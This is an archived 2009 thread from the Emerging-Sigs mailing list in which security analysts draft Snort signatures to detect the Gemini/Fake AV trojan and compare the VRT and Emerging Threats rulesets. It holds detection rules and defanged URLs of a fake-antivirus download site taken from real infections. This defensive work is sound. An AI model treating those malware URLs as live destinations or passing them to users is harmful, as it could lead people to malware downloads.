References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
Message-ID: <B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>

Posted, thanks Mike!

Matt

On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;  sid:2010xxx; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From r.fulton at auckland.ac.nz  Fri Dec  4 03:42:09 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Fri, 4 Dec 2009 21:42:09 +1300
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>
	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
Message-ID: <EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>


On 4/12/2009, at 7:51 AM, Matt Jonkman wrote:

> Very good question, I get asked it frequently in consulting. 
> 
> My answer is you need both. Your points are valid, SF goes after the top 20 sans, the latest and greatest netbios exploit, etc. Safe reliable and well tested stuff.
> 
> ET is more malware, we have a huge sandnet and a lot of other intelligence gathering going on. If you want to catch command and control channels, the latest and greatest outbreaks, you need the ET set. 
> 
> So I recommend running them in parallel, but you have to do some tweaking to eliminate duplications and get rid of the rules you're not interested in as always. 


Also depends on your environment.  I have been running both (we pay the VRT sub).  We are a large university and my sensors are starting to melt down under the load so I am looking to cut the number of rules and thus the load.  I post process the alerts looking for things I know to be reliable indications of trouble -- most usually malware.  I have a list of about 100 sids that I take particular note of and almost all start with 200....

So you can guess which I'm going to drop if I have to.  But *I* am primarily interested in who has been hit by the latest drive by download, duped into installing a new codec or simply mounted a student's USB drive to get the latest version of their thesis (with bonus extras :).

We have around 500 IPs exposed that respond on port 80 (if the snort reports on the latest searches for setup.php are to be believed). With this many machines there is now way I can respond to individual alerts on port 80.  What I use snort for here is as weather vane to help me focus my limited resources. Do should I be chasing joomla or moodle sites this week :)

If you have few web servers and a bunch of rigidly locked down desktops then VRT may be best if you can run both...

Russell


From wkitty42 at windstream.net  Fri Dec  4 04:27:53 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Fri, 04 Dec 2009 04:27:53 -0500
Subject: [Emerging-Sigs] Is the VRT ruleset worth it?
In-Reply-To: <EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>
References: <6116b9e20912030906p7647df0exa625f9c71b4b3fa1@mail.gmail.com>	<04550DFF-5D70-4BD9-919A-098E0B1FD807@jonkmans.com>
	<EBB1D200-BB8D-44AC-BE12-06E348B5FE38@auckland.ac.nz>
Message-ID: <4B18D619.6070707@windstream.net>

Russell Fulton wrote:
> On 4/12/2009, at 7:51 AM, Matt Jonkman wrote:
> 
>> Very good question, I get asked it frequently in consulting. 
>>
>> My answer is you need both. Your points are valid, SF goes after the top 20 sans, the latest and greatest netbios exploit, etc. Safe reliable and well tested stuff.
>>
>> ET is more malware, we have a huge sandnet and a lot of other intelligence gathering going on. If you want to catch command and control channels, the latest and greatest outbreaks, you need the ET set. 
>>
>> So I recommend running them in parallel, but you have to do some tweaking to eliminate duplications and get rid of the rules you're not interested in as always. 
@matt,
i cannot agree more... see below for further ;)

> 
> Also depends on your environment.  I have been running both (we pay the VRT sub).  We are a large university and my sensors are starting to melt down under the load so I am looking to cut the number of rules and thus the load.  I post process the alerts looking for things I know to be reliable indications of trouble -- most usually malware.  I have a list of about 100 sids that I take particular note of and almost all start with 200....

very much so... i'm always spending my time trying to explain to those using my 
snort related apps that they cannot simply accept the defaults and be done with 
it... especially if they are running servers and they are wanting to protect 
them... the same is to be said if they are only looking to protect their 
users... server related rules are simply noise if they are not protecting 
servers... the same goes for the other side of the coin, too...

> So you can guess which I'm going to drop if I have to.  But *I* am primarily interested in who has been hit by the latest drive by download, duped into installing a new codec or simply mounted a student's USB drive to get the latest version of their thesis (with bonus extras :).
> 
> We have around 500 IPs exposed that respond on port 80 (if the snort reports on the latest searches for setup.php are to be believed). With this many machines there is now way I can respond to individual alerts on port 80.  What I use snort for here is as weather vane to help me focus my limited resources. Do should I be chasing joomla or moodle sites this week :)

the answer to this question is "yes" ;) especially if you are also looking at 
the SANS @RISK postings... joomla is one of the most prominent apps listed... in 
fact, watching the @RISK list almost makes me simply want to turn it all off 
with all the notices of all the holes and such in so many commonly used apps :? 
:? :(

> If you have few web servers and a bunch of rigidly locked down desktops then VRT may be best if you can run both...

definitely agreed there!



From greencm at gmail.com  Fri Dec  4 10:53:18 2009
From: greencm at gmail.com (Chris Green)
Date: Fri, 4 Dec 2009 09:53:18 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
Message-ID: <bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>

Has anyone played with these enough to get a signature for the Fake AV
reporting?  I

Here's the URL and referer for one of these hits.

hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D

hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D

On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> Posted, thanks Mike!
>
> Matt
>
> On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
>
>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini; ?sid:2010xxx; rev:1;)
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Chris Green <greencm at gmail.com>

From evilghost at packetmail.net  Fri Dec  4 10:56:45 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Fri, 4 Dec 2009 09:56:45 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
Message-ID: <4B19313D.1030801@packetmail.net>

First URL should be covered by SID 2010007

Second URL, well, not really enough to sig on.

-evilghost

Chris Green wrote:
> Has anyone played with these enough to get a signature for the Fake AV
> reporting?  I
>
> Here's the URL and referer for one of these hits.
>
> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>
> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>
> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>   
>> Posted, thanks Mike!
>>
>> Matt
>>
>> On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
>>
>>     
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;  sid:2010xxx; rev:1;)
>>>       
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>     
>
>
>
>   

From eslerj at gmail.com  Fri Dec  4 11:08:20 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 4 Dec 2009 10:08:20 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
Message-ID: <314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>

What is that string?  the p52dcWIpcF%.... etc?  It's unique in and of
itself.  As much as I hate to write a sig to look for that kind of string,
is that a possibility?

J

On Fri, Dec 4, 2009 at 9:53 AM, Chris Green <greencm at gmail.com> wrote:

> Has anyone played with these enough to get a signature for the Fake AV
> reporting?  I
>
> Here's the URL and referer for one of these hits.
>
>
> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>
>
> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>
> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> > Posted, thanks Mike!
> >
> > Matt
> >
> > On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
> >
> >> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server;
> uricontent:"/Layouts/Landings/CentralLandings/"; nocase;
> uricontent:"/images/"; nocase;
> pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui";
> classtype:trojan-activity; reference:url,
> www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791;
> reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;
>  sid:2010xxx; rev:1;)
> >
> >
> > ----------------------------------------------------
> > Matthew Jonkman
> > Emerging Threats
> > Open Information Security Foundation (OISF)
> > Phone 765-429-0398
> > Fax 312-264-0205
> > http://www.emergingthreats.net
> > http://www.openinformationsecurityfoundation.org
> > ----------------------------------------------------
> >
> > PGP: http://www.jonkmans.com/mattjonkman.asc
> >
> >
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
>
>
>
> --
> Chris Green <greencm at gmail.com>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091204/1f007089/attachment-0001.html

From jonkman at jonkmans.com  Fri Dec  4 11:17:58 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 4 Dec 2009 11:17:58 -0500
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
	<314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>
Message-ID: <33D3237E-57A2-4135-BC05-8FB6C492B1F4@jonkmans.com>

We need to find a number of samples to see what remains constant in the url. Do you have other hits we can compare?

Matt

On Dec 4, 2009, at 11:08 AM, Joel Esler wrote:

> What is that string?  the p52dcWIpcF%.... etc?  It's unique in and of itself.  As much as I hate to write a sig to look for that kind of string, is that a possibility?  
> 
> J
> 
> On Fri, Dec 4, 2009 at 9:53 AM, Chris Green <greencm at gmail.com> wrote:
> Has anyone played with these enough to get a signature for the Fake AV
> reporting?  I
> 
> Here's the URL and referer for one of these hits.
> 
> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
> 
> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
> 
> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
> > Posted, thanks Mike!
> >
> > Matt
> >
> > On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
> >
> >> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;  sid:2010xxx; rev:1;)
> >
> >
> > ----------------------------------------------------
> > Matthew Jonkman
> > Emerging Threats
> > Open Information Security Foundation (OISF)
> > Phone 765-429-0398
> > Fax 312-264-0205
> > http://www.emergingthreats.net
> > http://www.openinformationsecurityfoundation.org
> > ----------------------------------------------------
> >
> > PGP: http://www.jonkmans.com/mattjonkman.asc
> >
> >
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> 
> 
> 
> --
> Chris Green <greencm at gmail.com>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> 
> 
> -- 
> Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Fri Dec  4 11:36:10 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Fri, 4 Dec 2009 10:36:10 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <33D3237E-57A2-4135-BC05-8FB6C492B1F4@jonkmans.com>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>	<314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>
	<33D3237E-57A2-4135-BC05-8FB6C492B1F4@jonkmans.com>
Message-ID: <4B193A7A.30503@packetmail.net>

I see Gemini often, I will try to go back through my stuff as well to 
see if we can find a unique string.  Question though, the first URL 
isn't reporting, it's the download redirector/director.  The second URL, 
is this successful download registration?  Is there value in adding the 
second if we're detecting on the first?  Is the second URL dependent of 
the first or self-generated?

Matt Jonkman wrote:
> We need to find a number of samples to see what remains constant in the url. Do you have other hits we can compare?
>
> Matt
>
> On Dec 4, 2009, at 11:08 AM, Joel Esler wrote:
>
>   
>> What is that string?  the p52dcWIpcF%.... etc?  It's unique in and of itself.  As much as I hate to write a sig to look for that kind of string, is that a possibility?  
>>
>> J
>>
>> On Fri, Dec 4, 2009 at 9:53 AM, Chris Green <greencm at gmail.com> wrote:
>> Has anyone played with these enough to get a signature for the Fake AV
>> reporting?  I
>>
>> Here's the URL and referer for one of these hits.
>>
>> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>>
>> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>>
>> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>>     
>>> Posted, thanks Mike!
>>>
>>> Matt
>>>
>>> On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
>>>
>>>       
>>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;  sid:2010xxx; rev:1;)
>>>>         
>>> ----------------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Open Information Security Foundation (OISF)
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> http://www.openinformationsecurityfoundation.org
>>> ----------------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>       
>>
>> --
>> Chris Green <greencm at gmail.com>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>
>>
>> -- 
>> Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>     
>
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From evilghost at packetmail.net  Fri Dec  4 11:57:07 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Fri, 4 Dec 2009 10:57:07 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <4B193A7A.30503@packetmail.net>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>	<314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>	<33D3237E-57A2-4135-BC05-8FB6C492B1F4@jonkmans.com>
	<4B193A7A.30503@packetmail.net>
Message-ID: <4B193F63.3080902@packetmail.net>

Looking at my data, the second URL (just p=) is not reporting, this is 
the initial site hit from the SEO poisoning and/or banner-ad 
redirection.  PCAP captures confirm this (HTTP REFERER is Google and/or 
other search engines).  From there, the site is displayed/etc and the 
first URL (download) is hit and download is attempted.

The string p52dcW is present after the p=, however, is it p52dcWltbV or 
p52dcWpbrF not the string Joel provided (so only a bit is constant, 
perhaps just p52dcW).  This was observed across multiple end-points and 
sites, spanning various dates.

We could potentially sig on this but all we'll be doing is firing on 
initial site access, not reporting, and SID 2010007 already detects the 
actual download.

AFAIK %2F will be decoded in the URI buffer (Joel, is this correct) 
since the string is p52dcW[A-Za-z]{4}%2F

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Trojan 
Potential Gemini/FakeAV site access"; flow:established,to_server; 
uricontent:".php?p=p52dcW"; pcre:"/\.php\?p=p52dcW[A-Za-z]{4}\x2f/U"; 
classtype:trojan-activity; 
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini; 
sid:2010xxx; rev:1;)

-evilghost

evilghost at packetmail.net wrote:
> I see Gemini often, I will try to go back through my stuff as well to 
> see if we can find a unique string.  Question though, the first URL 
> isn't reporting, it's the download redirector/director.  The second URL, 
> is this successful download registration?  Is there value in adding the 
> second if we're detecting on the first?  Is the second URL dependent of 
> the first or self-generated?
>
> Matt Jonkman wrote:
>   
>> We need to find a number of samples to see what remains constant in the url. Do you have other hits we can compare?
>>
>> Matt
>>
>> On Dec 4, 2009, at 11:08 AM, Joel Esler wrote:
>>
>>   
>>     
>>> What is that string?  the p52dcWIpcF%.... etc?  It's unique in and of itself.  As much as I hate to write a sig to look for that kind of string, is that a possibility?  
>>>
>>> J
>>>
>>> On Fri, Dec 4, 2009 at 9:53 AM, Chris Green <greencm at gmail.com> wrote:
>>> Has anyone played with these enough to get a signature for the Fake AV
>>> reporting?  I
>>>
>>> Here's the URL and referer for one of these hits.
>>>
>>> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>>>
>>> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
>>>
>>> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com> wrote:
>>>     
>>>       
>>>> Posted, thanks Mike!
>>>>
>>>> Matt
>>>>
>>>> On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
>>>>
>>>>       
>>>>         
>>>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server; uricontent:"/Layouts/Landings/CentralLandings/"; nocase; uricontent:"/images/"; nocase; pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui"; classtype:trojan-activity; reference:url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;  sid:2010xxx; rev:1;)
>>>>>         
>>>>>           
>>>> ----------------------------------------------------
>>>> Matthew Jonkman
>>>> Emerging Threats
>>>> Open Information Security Foundation (OISF)
>>>> Phone 765-429-0398
>>>> Fax 312-264-0205
>>>> http://www.emergingthreats.net
>>>> http://www.openinformationsecurityfoundation.org
>>>> ----------------------------------------------------
>>>>
>>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>>
>>>>
>>>>
>>>> _______________________________________________
>>>> Emerging-sigs mailing list
>>>> Emerging-sigs at emergingthreats.net
>>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>>
>>>>       
>>>>         
>>> --
>>> Chris Green <greencm at gmail.com>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>
>>>
>>> -- 
>>> Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>     
>>>       
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>   
>>     
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From phatbuckett at gmail.com  Fri Dec  4 12:01:07 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Fri, 4 Dec 2009 10:01:07 -0700
